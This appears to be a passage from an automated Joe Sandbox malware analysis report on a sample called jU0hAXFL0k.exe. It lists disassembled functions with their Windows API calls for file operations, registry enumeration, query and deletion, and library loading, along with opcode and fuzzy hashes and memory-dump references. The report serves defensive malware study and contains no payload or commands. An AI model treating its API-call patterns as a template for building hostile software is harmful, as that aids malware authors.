                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                                                                        • Instruction ID: 3517892101dd69bd75e64738494877d03a8317e446f0652336487a17687a2cae
                                                                                        • Opcode Fuzzy Hash: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                                                                        • Instruction Fuzzy Hash: 53712571E04229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281D7789996DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040696F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                                                                        • Instruction ID: 34c5161cf4e4322df4c522de15ced9ded486b5ca7425d8c28145854c0c0886a7
                                                                                        • Opcode Fuzzy Hash: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                                                                        • Instruction Fuzzy Hash: 29714571D04229DBEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004022B2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004062DD: FindFirstFileA.KERNELBASE(76403410,00421558,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                                                                          • Part of subcall function 004062DD: FindClose.KERNEL32(00000000), ref: 004062F4
                                                                                        • lstrlenA.KERNEL32 ref: 004022F2
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 004022FC
                                                                                        • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                        • String ID:
                                                                                        • API String ID: 1486964399-0
                                                                                        • Opcode ID: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
                                                                                        • Instruction ID: e190a191dd6904399be212acf1c509ba618b837bf102c15a3da6bfbe2c681905
                                                                                        • Opcode Fuzzy Hash: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
                                                                                        • Instruction Fuzzy Hash: E6112A71E04318AACB00EFB98949A8EBBB9EF04318F10407BA405FB2D2D6BCD540CB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040254C Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
                                                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402591
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Enum$CloseValue
                                                                                        • String ID:
                                                                                        • API String ID: 397863658-0
                                                                                        • Opcode ID: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
                                                                                        • Instruction ID: 35fd857a3e442691b1a787247be78dd7b49a46040516f967143c2ea575d22cfd
                                                                                        • Opcode Fuzzy Hash: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
                                                                                        • Instruction Fuzzy Hash: 5801B1B1905204FFE7119F659E89ABF7ABCEB40344F10443EF402B62C0D6B85E019669
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004024DA Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040250A
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3356406503-0
                                                                                        • Opcode ID: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
                                                                                        • Instruction ID: 8f3c8c2c6778634c6bf67ed2425ae169c6cf17cae75ec7db2a606e7394f4df6a
                                                                                        • Opcode Fuzzy Hash: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
                                                                                        • Instruction Fuzzy Hash: 36118F71905205FEDB11CF64CA5D5AEBAB4AF15344F60447FE042B62C0D2B88A45DB2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                                                                        • Instruction ID: 3754a530b6758dc8908f2ef617aa9c280200ea706ec51d0fb7e67c491179f4d9
                                                                                        • Opcode Fuzzy Hash: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                                                                        • Instruction Fuzzy Hash: A3012831724210ABE7294B389D04B2A369CE710328F11823BF811F72F1D6B8DC02DB4D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004023E8 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402409
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402412
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteValue
                                                                                        • String ID:
                                                                                        • API String ID: 2831762973-0
                                                                                        • Opcode ID: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
                                                                                        • Instruction ID: ce1450a8ab12a7957634bce685e0bfb7e2b45ee5234afc219fd3c41b35330c67
                                                                                        • Opcode Fuzzy Hash: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
                                                                                        • Instruction Fuzzy Hash: AAF0F672E04120ABD700AFB89B4DAAE72A89B44304F11017BF202B72C1D5F85E02826E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004051D3 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 004051E3
                                                                                          • Part of subcall function 004040B4: SendMessageA.USER32(00010410,00000000,00000000,00000000), ref: 004040C6
                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 0040522F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeMessageSendUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2896919175-0
                                                                                        • Opcode ID: 8f85f5a8b917a8e83986f1e9b037d27413aa3264665e42cac53abf952752d631
                                                                                        • Instruction ID: c8a811e9c9fb5a5b15e00e8e17d8607129a9d45208e9b7412ec8ad736198a790
                                                                                        • Opcode Fuzzy Hash: 8f85f5a8b917a8e83986f1e9b037d27413aa3264665e42cac53abf952752d631
                                                                                        • Instruction Fuzzy Hash: 82F0F0F6A00201BBEA606B40A801B1773B0EFD0702F00847EFF44B22E1D63D59028E6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                                        • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStringslstrcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1938659011-0
                                                                                        • Opcode ID: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
                                                                                        • Instruction ID: 79d5ad403a5aaaf22ef605bc71de2bbac2c7999a6642915e38ea97ae4a47edd5
                                                                                        • Opcode Fuzzy Hash: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
                                                                                        • Instruction Fuzzy Hash: BAF0A771B09240EBCB21DF759D44A9F7FE8EF91354B10803BE145F6290D2388901CB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401E8F Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableShow
                                                                                        • String ID:
                                                                                        • API String ID: 1136574915-0
                                                                                        • Opcode ID: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
                                                                                        • Instruction ID: ea2ebfb6392eb1d35c1d77cf7a204b1acfca181ccf64587d83a13520139c7bad
                                                                                        • Opcode Fuzzy Hash: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
                                                                                        • Instruction Fuzzy Hash: C8E012B2A08210DFD715DFA8AA859AE77B4FB84325F10493BE102F12D1D7B85940965D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406372 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                          • Part of subcall function 00406304: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
                                                                                          • Part of subcall function 00406304: wsprintfA.USER32 ref: 00406354
                                                                                          • Part of subcall function 00406304: LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 00406368
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2547128583-0
                                                                                        • Opcode ID: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                                                                        • Instruction ID: 5c1bd2d9329a739c8a877d318ed38f6c7ac4115b407851283e1fe7e546b0050a
                                                                                        • Opcode Fuzzy Hash: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                                                                        • Instruction Fuzzy Hash: 85E08C32A08210ABD7106B709D0493B72E89B85700302483EFE0AF2191D738EC21AAA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405B73 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00405B77
                                                                                        • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                                                        • Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
                                                                                        • Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                                                        • Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405644 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403228,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 0040564A
                                                                                        • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 00405658
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        • Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
